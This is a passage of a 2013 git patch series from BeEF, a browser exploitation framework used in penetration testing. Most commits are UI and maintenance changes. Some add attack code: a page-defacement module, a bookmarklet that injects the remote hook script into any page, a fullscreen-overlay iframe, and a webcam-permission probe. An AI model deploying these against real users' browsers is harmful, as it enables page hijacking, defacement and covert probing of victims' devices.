+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced "+ result +" elements");
+});
diff --git a/modules/browser/hooked_domain/deface_web_page_component/config.yaml b/modules/browser/hooked_domain/deface_web_page_component/config.yaml
new file mode 100644
index 000000000..2af4954c0
--- /dev/null
+++ b/modules/browser/hooked_domain/deface_web_page_component/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        deface_web_page_component:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Replace Component (Deface)"
+            description: "Overwrite a particular component of the hooked page."
+            authors: ["antisnatchor","xntrik"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/browser/hooked_domain/deface_web_page_component/module.rb b/modules/browser/hooked_domain/deface_web_page_component/module.rb
new file mode 100644
index 000000000..779aa3c96
--- /dev/null
+++ b/modules/browser/hooked_domain/deface_web_page_component/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Deface_web_page_component < BeEF::Core::Command
+
+  def self.options
+    return [
+		{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', 'width'=>'200px' },
+		{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width'=>'200px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+
+  end
+
+end

From 9ca50e0505ea8207f22c3ebee4a64160566d3153 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 29 Mar 2013 15:16:56 +1030
Subject: [PATCH 243/397] Comment out two `console.log()` lines in
 hookChildFrames

---
 core/main/client/browser.js | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 860727cea..82556c71a 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -858,10 +858,10 @@ beef.browser = {
             try {
                 // append hook script
                 self.frames[i].document.body.appendChild(script);
-                console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+                //console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                console.log("Hooking frame failed");
+                //console.log("Hooking frame failed");
             }
         }
     },

From 26933fe146e194a734f02c827e8e89a81ab882f7 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Fri, 29 Mar 2013 13:33:09 +0800
Subject: [PATCH 244/397] Fix for #826. Plus - logs also include a column for
 which browser an event is associated with

---
 extensions/admin_ui/controllers/logs/logs.rb    |  3 ++-
 .../media/javascript/ui/panel/DataGrid.js       | 17 ++++++++++++-----
 2 files changed, 14 insertions(+), 6 deletions(-)

diff --git a/extensions/admin_ui/controllers/logs/logs.rb b/extensions/admin_ui/controllers/logs/logs.rb
index 2f90dfb0d..c6ff99e7a 100644
--- a/extensions/admin_ui/controllers/logs/logs.rb
+++ b/extensions/admin_ui/controllers/logs/logs.rb
@@ -63,7 +63,8 @@ class Logs < BeEF::Extension::AdminUI::HttpController
         'id' => log.id.to_i,
         'date' => log.date.to_s,
         'event' => log.event.to_s,
-        'type' => log.type.to_s
+        'type' => log.type.to_s,
+        'hooked_browser_id' => log.hooked_browser_id.to_i
       }
     end
     
diff --git a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
index 570448307..2a8caae48 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
@@ -18,10 +18,10 @@ DataGrid = function(url, page, base) {
         storeId: 'myStore',
         baseParams: this.base,
         idProperty: 'id',
-        fields: ['id','type','event','date'],
+        fields: ['id','type','event','date','hooked_browser_id'],
         totalProperty: 'count',
         remoteSort: false,
-        sortInfo: {field: "date", direction: "DESC"}
+        sortInfo: {field: "id", direction: "DESC"}
     });
 
     this.bbar = new Ext.PagingToolbar({
@@ -35,9 +35,10 @@ DataGrid = function(url, page, base) {
     this.columns = [{
 			id: 'log-id',
 			header: 'Id',
-			hidden: true,
+			hidden: false,
 			dataIndex: 'id',
-			sortable: false
+			sortable: true,
+			width: 20
 		}, {
 			id: 'log-type',
 			header: "Type",
@@ -61,6 +62,12 @@ DataGrid = function(url, page, base) {
 			width: 80,
 			renderer:  $jEncoder.encoder.encodeForHTML(this.formatDate),
 			sortable:true
+		}, {
+			id: 'log-browser',
+			header: "Browser ID",
+			dataIndex: 'hooked_browser_id',
+			sortable: true,
+			width: 35
     }];
 
     DataGrid.superclass.constructor.call(this, {
@@ -78,7 +85,7 @@ DataGrid = function(url, page, base) {
 		
 		listeners: {
 			afterrender: function(datagrid) {
-				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"date", dir:"DESC"}});
+				datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"id", dir:"DESC"}});
 			}
 		}
     });

From 760e7a456eadc7c9d96444b3c3b93ef8f7940ef1 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 29 Mar 2013 15:59:48 +1030
Subject: [PATCH 245/397] Update version

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 1ec6e22dc..38a1f3dae 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.3-alpha
+0.4.4.4-alpha
diff --git a/config.yaml b/config.yaml
index 3b95ff0de..cc78202bb 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.3-alpha'
+    version: '0.4.4.4-alpha'
     debug: false
 
     restrictions:

From 22cd68101d29e0002e428ca838a9283d3f92a0c2 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 30 Mar 2013 17:31:36 +0800
Subject: [PATCH 246/397] Added Bookmarklet to the Welcome Tab in the Admin UI.
 #863

---
 .../admin_ui/media/javascript/ui/panel/WelcomeTab.js     | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
index e420dc430..ba3beab60 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -6,6 +6,10 @@
 
 WelcomeTab = function() {
 
+    var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
+    var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
+    bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
+
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
               <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
@@ -13,6 +17,7 @@ WelcomeTab = function() {
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
               <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
+              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's status bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
               <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
               <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
               </div>\
               ";
 
-    WelcomeTab.superclass.constructor.call(this, {
+  welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
+
+  WelcomeTab.superclass.constructor.call(this, {
 	region:'center',
 	padding:'10 10 10 10',
 	html: welcome,

From af8018500ba3c65edace7dbc10d021861964a41d Mon Sep 17 00:00:00 2001
From: Saafan <ahmed.saafan@jidari.com>
Date: Sun, 31 Mar 2013 16:22:58 +0200
Subject: [PATCH 247/397] Fixing some unit tests

---
 Rakefile                             | 6 +++---
 test/integration/tc_debug_modules.rb | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/Rakefile b/Rakefile
index 31c28e16d..e40188318 100644
--- a/Rakefile
+++ b/Rakefile
@@ -76,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end
diff --git a/test/integration/tc_debug_modules.rb b/test/integration/tc_debug_modules.rb
index 56ab4ba3f..1fc229a06 100644
--- a/test/integration/tc_debug_modules.rb
+++ b/test/integration/tc_debug_modules.rb
@@ -170,7 +170,7 @@ class TC_DebugModules < Test::Unit::TestCase
     data = JSON.parse(result['0']['data'])['data']
     assert_not_nil data
     assert_equal 200, JSON.parse(data)["status_code"]
-    assert JSON.parse(data)["response_body"].include?("However you should still be capable of accessing it\n\t\tusing the Requester")
+    assert JSON.parse(data)["port_status"].include?("open")
 
   end
 end
\ No newline at end of file

From e8eda3ef99985c926f5b865cb2203ea732466e34 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 1 Apr 2013 11:07:50 +0800
Subject: [PATCH 248/397] Minor enhancements to the Admin UI. #864

---
 .../admin_ui/controllers/panel/index.html     |  2 ++
 extensions/admin_ui/media/css/base.css        | 13 ++++++++++-
 .../media/javascript/ui/panel/PanelViewer.js  | 22 ++++++++++++++++++-
 3 files changed, 35 insertions(+), 2 deletions(-)

diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index dbc9a42ef..0e111307b 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -60,6 +60,8 @@
 <body>
 	<%= nonce_tag %>	
 	<div id="header">
+		<div class="left-menu" id="header-right">
+		</div>
 		<div class="right-menu">
 			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 
diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css
index 037945ad1..805780fed 100644
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -5,13 +5,24 @@
  */
 
 #header .right-menu {
+	width: 300px;
 	float: right;
-	margin: 10px;
+	margin: 3px 3px 0 4px;
 	word-spacing: 5px;
 	font: 11px arial, tahoma, verdana, helvetica;
 	color:#000;
 }
 
+#header .left-menu {
+	width: 300px;
+	float: left;
+	margin: 10px 4px 0 20px;
+	word-spacing: 5px;
+	font: 11px arial, tahoma, verdana, helvetica;
+	font-weight: bolder;
+	color:red;
+}
+
 #header a:link,
 #header a:visited {
 	color:#000;
diff --git a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
index 91a33acd4..19442d570 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
@@ -42,19 +42,39 @@ Ext.onReady(function() {
  * This event updater retrieves updates every 8 seconds. Those updates
  * are then pushed to various managers (i.e. the zombie manager).
  */
+var lastpoll = new Date().getTime();
+
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
 			url: '/ui/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
-				var updates = Ext.util.JSON.decode(response.responseText);
+				var updates;
+				try {
+					updates = Ext.util.JSON.decode(response.responseText);
+				} catch (e) {
+					//The framework has probably been reset and you're actually logged out
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
+				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
 				
 				if(zombiesManager && hooked_browsers) {
 					zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
 				}
+				lastpoll = new Date().getTime();
+				var hr = document.getElementById("header-right");
+				hr.innerHTML = "";
+			},
+			failure: function(response) {
+				var timenow = new Date().getTime();
+
+				if ((timenow - lastpoll) > 60000) {
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "Framework is down";
+				}
 			}
 		});
 	},

From 389f27360d6aa779192adf21d0d45eea998582de Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 1 Apr 2013 19:51:16 +0800
Subject: [PATCH 249/397] Slight spelling mistake fix up in the Welcome tab of
 the Admin UI

---
 extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
index ba3beab60..397d24966 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -17,7 +17,7 @@ WelcomeTab = function() {
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
               <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
-              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's status bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
+              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
               <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
               <p>To interact with a hooked browser simply left-click it, a new tab will appear. \

From 9a23ed758e0049b053f44cf48b9e33c6a1bbb1bc Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Tue, 2 Apr 2013 14:33:57 +0800
Subject: [PATCH 250/397] New getHighestZindex function in beef.dom and updated
 createIframe beef.dom function. #865

---
 core/main/client/dom.js | 26 +++++++++++++++++++++++++-
 1 file changed, 25 insertions(+), 1 deletion(-)

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 305ef0366..2026f7117 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -76,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -96,7 +120,7 @@ beef.dom = {
 			params['src'] = '';
 		}
 		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)

From cf4ab9533ec28101414d4749b2758639d3a83eff Mon Sep 17 00:00:00 2001
From: BWZ <ben@delonge.com.au>
Date: Wed, 3 Apr 2013 09:01:15 +1000
Subject: [PATCH 251/397] Added Webcam Permission Check Module

---
 .../webcam_permision_check/cameraCheck.as     |  54 ++++++++++++++++++
 .../webcam_permision_check/cameraCheck.swf    | Bin 0 -> 6048 bytes
 .../browser/webcam_permision_check/command.js |  39 +++++++++++++
 .../webcam_permision_check/config.yaml        |  15 +++++
 .../browser/webcam_permision_check/module.rb  |  18 ++++++
 .../webcam_permision_check/swfobject.js       |   4 ++
 6 files changed, 130 insertions(+)
 create mode 100644 modules/browser/webcam_permision_check/cameraCheck.as
 create mode 100644 modules/browser/webcam_permision_check/cameraCheck.swf
 create mode 100644 modules/browser/webcam_permision_check/command.js
 create mode 100644 modules/browser/webcam_permision_check/config.yaml
 create mode 100644 modules/browser/webcam_permision_check/module.rb
 create mode 100644 modules/browser/webcam_permision_check/swfobject.js

diff --git a/modules/browser/webcam_permision_check/cameraCheck.as b/modules/browser/webcam_permision_check/cameraCheck.as
new file mode 100644
index 000000000..c4fcc40d4
--- /dev/null
+++ b/modules/browser/webcam_permision_check/cameraCheck.as
@@ -0,0 +1,54 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Source ActionScript for cameraCheck.swf
+package {
+
+    import flash.display.Sprite;
+    import flash.external.ExternalInterface;
+    import flash.media.Camera;
+    import flash.system.Security;
+    import flash.system.SecurityPanel;
+
+    public class CamCheck extends Sprite {
+
+        var _cam:Camera;
+
+        public function CamCheck() {
+
+            if (Camera.isSupported)     {
+                this._cam = Camera.getCamera();
+
+                if (!this._cam) {
+
+	                //Either the camera is not available or some other error has occured
+                    ExternalInterface.call("naPermissions");
+
+                } else if (this._cam.muted) {
+
+	                //The user has not allowed access to the camera
+                    ExternalInterface.call("noPermissions");
+
+                    // Uncomment this show the privacy/security settings window
+                    //Security.showSettings(SecurityPanel.PRIVACY);
+                } else {
+
+                    //The user has allowed access to the camera
+                    ExternalInterface.call("yesPermissions");
+                }
+
+            } else {
+
+                //Camera Not Supported
+                ExternalInterface.call("naPermissions");
+
+            }
+
+        }
+
+    }
+
+}
\ No newline at end of file
diff --git a/modules/browser/webcam_permision_check/cameraCheck.swf b/modules/browser/webcam_permision_check/cameraCheck.swf
new file mode 100644
index 0000000000000000000000000000000000000000..7894dd240ee75dd524ce66e70711b5484113d47a
GIT binary patch
literal 6048
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
